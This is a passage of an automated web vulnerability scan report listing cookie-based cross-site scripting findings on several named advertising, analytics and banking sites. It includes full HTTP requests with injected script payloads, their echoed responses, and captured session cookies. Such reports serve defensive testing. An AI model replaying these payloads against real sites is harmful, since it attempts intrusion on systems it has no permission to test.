4.60. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into a single-quoted JavaScript string literal in a response served as application/x-javascript (the COMSCORE.BMX.Broker.Cookies object echoes the request's cookies). The payload 44c04<script>alert(1)</script>db3d641228c was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

As returned, the echoed <script> tags are inert: they sit inside a JavaScript string literal and the response is not HTML. The payload contains no single quote or backslash, so it did not terminate the literal; demonstrating script execution would require a payload that closes the quoted string, which this probe does not show. The finding stands as an absence of output encoding in a JavaScript string context rather than as a working proof-of-concept.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732015&AR_C=178113848 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&44c04<script>alert(1)</script>db3d641228c; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:15 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:15 2011&prad=253732015&arc=178113848&; expires=Mon 25-Jul-2011 14:21:15 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303827675; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732015",Pid:"p97174789",Arc:"178113848",Location:
...[SNIP]...
&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&44c04<script>alert(1)</script>db3d641228c', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobu
...[SNIP]...

4.61. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into a single-quoted JavaScript string literal in a response served as application/x-javascript (the COMSCORE.BMX.Broker.Cookies object echoes the request's cookies). The payload 934b1<script>alert(1)</script>b9c17a19ff1 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

As returned, the echoed <script> tags are inert: they sit inside a JavaScript string literal and the response is not HTML. The payload contains no single quote or backslash, so it did not terminate the literal; demonstrating script execution would require a payload that closes the quoted string, which this probe does not show. The finding stands as an absence of output encoding in a JavaScript string context rather than as a working proof-of-concept.

Unlike the other cookies on this host, ar_p97174789 is rewritten by the server: the response's Set-Cookie header re-emits the payload as an extra &-delimited sub-field (...&934b1<script>alert(1)</script>b9c17a19ff1=&prad=...) with a new expiry of 25-Jul-2011. A value injected into this cookie once is therefore re-issued to the browser and reflected again on subsequent requests.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732015&AR_C=178113848 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&934b1<script>alert(1)</script>b9c17a19ff1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:17 2011&934b1<script>alert(1)</script>b9c17a19ff1=&prad=253732015&arc=178113848&; expires=Mon 25-Jul-2011 14:21:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303827677; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732015",Pid:"p97174789",Arc:"178113848",Location:
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&934b1<script>alert(1)</script>b9c17a19ff1', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "a
...[SNIP]...

4.62. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into a single-quoted JavaScript string literal in a response served as application/x-javascript (the COMSCORE.BMX.Broker.Cookies object echoes the request's cookies). The payload b0db8<script>alert(1)</script>b0d978f9552 was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

As returned, the echoed <script> tags are inert: they sit inside a JavaScript string literal and the response is not HTML. The payload contains no single quote or backslash, so it did not terminate the literal; demonstrating script execution would require a payload that closes the quoted string, which this probe does not show. The finding stands as an absence of output encoding in a JavaScript string context rather than as a working proof-of-concept.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732015&AR_C=178113848 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1b0db8<script>alert(1)</script>b0d978f9552; ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:17 2011&prad=253732015&arc=178113848&; expires=Mon 25-Jul-2011 14:21:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303827677; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732015",Pid:"p97174789",Arc:"178113848",Location:
...[SNIP]...
ne:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&', "ar_s_p81479006": '1b0db8<script>alert(1)</script>b0d978f9552', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p81479006": 'exp=1&ini
...[SNIP]...

4.63. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags, inside a div hidden with display:none in a text/html response; hiding the element does not stop a script inside it from running. The payload 21b12<script>alert(1)</script>d71cda52c54 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.tenable.com%2Fservices%2Fnessus-perimeter-service%3Fgclid%3DCNLb8cPsuKgCFQbe4AodEirYCA&jsref=&rnd=1303775074503 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==21b12<script>alert(1)</script>d71cda52c54; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 25 Apr 2011 23:45:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==21b12<script>alert(1)</script>d71cda52c54
userid:
</div>
...[SNIP]...

4.64. http://www.bankofamerica.com/weblinking/flyout/HM_Arrays.js [state cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /weblinking/flyout/HM_Arrays.js

Issue detail

The value of the state cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d7fa"><script>alert(1)</script>c094ae10236 was submitted in the state cookie. This input was echoed unmodified in the application's response. The response is the server's 404 error page for this path rather than the requested script; the cookie value is written into the href of a contact link there, and the payload's double quote closes the attribute so the script tag that follows is parsed as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /weblinking/flyout/HM_Arrays.js HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/weblinking/?referredby=futurescholar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; throttle_value=35; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; state=MA4d7fa"><script>alert(1)</script>c094ae10236; CFID=132569126; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; GEOSERVER=2; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:27:56 GMT
Content-type: text/html
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Content-Length: 13458

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Description" content="Plea
...[SNIP]...
<a href="http://www.bankofamerica.com/contact/?state=MA4d7fa"><script>alert(1)</script>c094ae10236">
...[SNIP]...

4.65. https://www.bankofamerica.com/privacy [state cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy

Issue detail

The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f662a'%3balert(1)//d027475f5ab was submitted in the state cookie. This input was echoed as f662a';alert(1)//d027475f5ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /privacy HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MAf662a'%3balert(1)//d027475f5ab; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:50:20 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:50:20 GMT
Content-language: en-US
Set-cookie: JSESSIONID=0000e9eWJbK00Pixiad4Sv7pDX9:12qb4kb6q; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...
<!--


               cmSetProduction();
       

               cmCreateRegistrationTag(null,
                   'overview',
                   20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1,
                   false,
                   'MAf662a';alert(1)//d027475f5ab',
                   null,
                   'privacy',
                   null,
                   null,
                   null);
       
       
//-->
...[SNIP]...

4.66. https://www.bankofamerica.com/privacy/Control.do [state cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy/Control.do

Issue detail

The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1881f'%3balert(1)//dd2288e8694 was submitted in the state cookie. This input was echoed as 1881f';alert(1)//dd2288e8694 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /privacy/Control.do HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA1881f'%3balert(1)//dd2288e8694; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:50:07 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=00002Z9N97tt_YBpMs8JQRkjAus:12qb4k2ev; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...
<!--


               cmSetProduction();
       

               cmCreateRegistrationTag(null,
                   'overview',
                   20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1,
                   false,
                   'MA1881f';alert(1)//dd2288e8694',
                   null,
                   'privacy',
                   null,
                   null,
                   null);
       
       
//-->
...[SNIP]...

4.67. https://www.bankofamerica.com/privacy/index.jsp [state cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy/index.jsp

Issue detail

The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 789a0'%3balert(1)//ac10ab97be4 was submitted in the state cookie. This input was echoed as 789a0';alert(1)//ac10ab97be4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /privacy/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA789a0'%3balert(1)//ac10ab97be4; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:50:08 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000HD3pctAiud3N0DAMmKPttdB:12qb4k93q; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...
<!--


               cmSetProduction();
       

               cmCreateRegistrationTag(null,
                   'overview',
                   20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1,
                   false,
                   'MA789a0';alert(1)//ac10ab97be4',
                   null,
                   'privacy',
                   null,
                   null,
